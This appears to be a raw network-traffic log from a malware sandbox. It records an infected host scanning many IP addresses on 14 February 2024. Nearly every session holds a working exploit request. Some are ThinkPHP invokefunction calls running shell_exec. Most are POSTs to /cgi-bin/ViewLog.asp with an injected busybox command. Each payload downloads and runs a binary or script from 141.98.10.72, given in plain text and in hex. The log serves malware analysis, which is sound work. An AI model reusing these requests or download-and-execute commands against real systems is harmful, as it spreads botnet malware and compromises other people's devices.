                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b6b0f748&#46;1707899319&#46;256d07c9</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            352192.168.2.233667095.146.22.23480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.762053013 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:39.971195936 CET49INHTTP/1.1 404 Site or Page Not Found
                                                            Feb 14, 2024 09:28:39.971445084 CET317INData Raw: 53 65 72 76 65 72 3a 20 51 75 61 6c 76 69 73 69 6f 6e 20 2d 48 54 54 50 53 65 72 76 65 72 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 30 37 3a 32 32 3a 33 31 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a
                                                            Data Ascii: Server: Qualvision -HTTPServerDate: Wed Feb 14 07:22:31 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or P


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            353192.168.2.235557695.100.62.12780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.763923883 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:39.974184036 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:39 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:39 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 35 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 31 39 26 23 34 36 3b 31 33 61 66 39 31 30 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;35161502&#46;1707899319&#46;13af910d</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            354192.168.2.234767631.200.25.228080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.769105911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            355192.168.2.234398462.29.0.1428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.771090984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            356192.168.2.234266094.122.7.808080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.772608042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            357192.168.2.233728831.200.29.1098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.772870064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            358192.168.2.234933094.122.106.168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.774425030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            359192.168.2.235418894.121.205.1168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.776315928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            360192.168.2.234666862.29.112.1648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.776582003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            361192.168.2.234824895.217.39.2480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.781399965 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:40.008292913 CET295INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            362192.168.2.233613685.72.54.2258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.787861109 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:40.073842049 CET1286INHTTP/1.1 404 Not Found
                                                            Server: mxhttpd/2.19-MX Apr 21 2021
                                                            Content-type: text/html
                                                            Date: Wed, 14 Feb 2024 08:28:39 GMT
                                                            Last-modified: Wed, 14 Feb 2024 08:28:39 GMT
                                                            Accept-Ranges: bytes
                                                            Connection: close
                                                            Content-length: 7567
                                                            X-Frame-Options: SAMEORIGIN
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 39 27 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 70 75 62 6c 69 73 68 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 4d 4f 42 4f 54 49 58 20 41 47 2c 20 47 65 72 6d 61 6e 79 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 63 6f 70 79 72 69 67 68 74 27 20 63 6f 6e 74 65 6e 74 3d 27 4d 4f 42 4f 54 49 58 20 41 47 2c 20 47 65 72 6d 61 6e 79 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 27 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 61 75 74 68 6f 72 27 20 63 6f 6e 74 65 6e 74 3d 27 44 61 6e 69 65 6c 20 4b 61 62 73 2c 20 4d 4f 42 4f 54 49 58 20 41 47 2c 20 47 65 72 6d 61 6e 79 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 6f 77 6e 65 72 27 20 68 72 65 66 3d 27 6d 61 69 6c 74 6f 3a 69 6e 66 6f 40 6d 6f 62 6f 74 69 78 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 63 6f 70 79 72 69 67 68 74 27 20 68 72 65 66 3d 27 2f 61 62 6f 75 74 2e 68 74 6d 6c 27 20 74 69 74 6c 65 3d 27 43 6f 70 79 72 69 67 68 74 27 20 2f 3e 0a 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 25 3b 0a 7d 0a 2e 76 65 6e 64 6f 72 69 63 6f 6e 20 7b 0a 09 68 65 69 67 68 74 3a 31 38 70 78 3b 0a 7d 0a 70 72 65 2c 0a 74 65 78 74 61 72 65 61 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 3b 0a 7d 0a 2e 68 65 61 64 74 61 62 6c 65 73 6d 61 6c 6c 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 34 34 39 34 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 35 25 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 0a 09 70 61 64 64 69 6e 67 3a 34 70 78 3b 0a 7d 0a 2e 68 65 61 64 74 61 62 6c 65 73 6d 61 6c 6c 20 69 6d 67 20 7b 0a 09 62 6f 72 64 65 72 3a 30 70 78 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 0a 7d 0a 2e 68 65 61 64 74 61 62 6c 65 73 6d 61 6c 6c 20 2e 63 6f 6d 70 61 6e 79 6e 61 6d 65 20 7b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 70
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv='X-UA-Compatible' content='IE=9' /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name='publisher' content='MOBOTIX AG, Germany' /><meta name='copyright' content='MOBOTIX AG, Germany' /><link rel='shortcut icon' href='/favicon.ico' /><link rel='apple-touch-icon' href='/apple-touch-icon.png' /><meta name='author' content='Daniel Kabs, MOBOTIX AG, Germany' /><link rel='owner' href='mailto:info@mobotix.com' /><link rel='copyright' href='/about.html' title='Copyright' /><style type='text/css'>body {font-family:Helvetica,Arial;font-size:80%;}.vendoricon {height:18px;}pre,textarea {font-family:monospace;}.headtablesmall {background:#004494;font-size:125%;overflow:auto;padding:4px;}.headtablesmall img {border:0px;vertical-align:middle;}.headtablesmall .companyname {padding-left:3px;padding-right:3p


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            363192.168.2.235421295.57.110.8980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.850385904 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:40.150019884 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:28:40.150885105 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            364192.168.2.234552695.164.89.1818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.923856020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:40.122709036 CET207INHTTP/1.1 404 Not Found
                                                            Content-Type: text/plain; charset=utf-8
                                                            X-Content-Type-Options: nosniff
                                                            Date: Wed, 14 Feb 2024 08:28:40 GMT
                                                            Content-Length: 19
                                                            Connection: close
                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                            Data Ascii: 404 page not found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            365192.168.2.234082494.238.155.2048080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.924902916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:40.541707039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:41.757569075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            366192.168.2.2334698124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:39.937975883 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 33 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:39Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            367192.168.2.234790894.123.116.28080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.017515898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            368192.168.2.235164494.122.21.438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.018070936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            369192.168.2.234813894.121.49.738080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.019644976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            370192.168.2.235317694.123.125.158080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:40.023943901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
